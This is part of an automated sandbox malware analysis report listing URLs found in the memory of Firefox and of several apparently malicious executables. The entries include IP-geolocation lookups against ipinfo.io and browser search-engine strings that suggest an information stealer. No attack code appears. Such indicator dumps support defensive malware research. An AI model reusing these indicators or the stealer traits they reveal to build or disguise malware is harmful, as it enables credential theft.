                          Source: firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
                          Source: firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
                          Source: firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
                          Source: firefox.exe, 00000024.00000003.3105381143.00000154627D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
                          Source: firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
                          Source: firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
                          Source: firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
                          Source: firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C2CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2705767411.000001545C2A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
                          Source: firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2963701016.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3308363713.00000154624C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2729292477.000001545340A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: firefox.exe, 00000024.00000003.2680917978.0000015462217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?t=ffab&q=
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3058167979.000001545E4C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 00000024.00000003.2544170039.0000015462470000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546317C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3130963337.0000015463180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
                          Source: firefox.exe, 00000024.00000003.2544170039.0000015462470000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2544441919.000001546244B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546317C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546319E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3073372084.0000015454B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
                          Source: firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3058167979.000001545E4C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: firefox.exe, 00000024.00000003.2681929243.0000015462212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/cfworker
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
                          Source: firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2519834399.000001545C185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2519834399.000001545C185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/issues/1266
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000024.00000003.2556318655.000001545FDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 00000024.00000003.2679918392.000001546225E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/?
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/C:
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/sA
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/191.96.227.222
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/191.96.227.222$;.
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/191.96.227.222Q
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/z
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/191.96.227.222
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/191.96.227.222I
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/191.96.227.222a&
                          Source: firefox.exe, 00000024.00000003.2683298473.0000015462047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema.
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema./
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
                          Source: firefox.exe, 00000024.00000003.2557113466.0000015455953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/
                          Source: firefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
                          Source: firefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-escapes#single
                          Source: firefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mths.be/jsesc
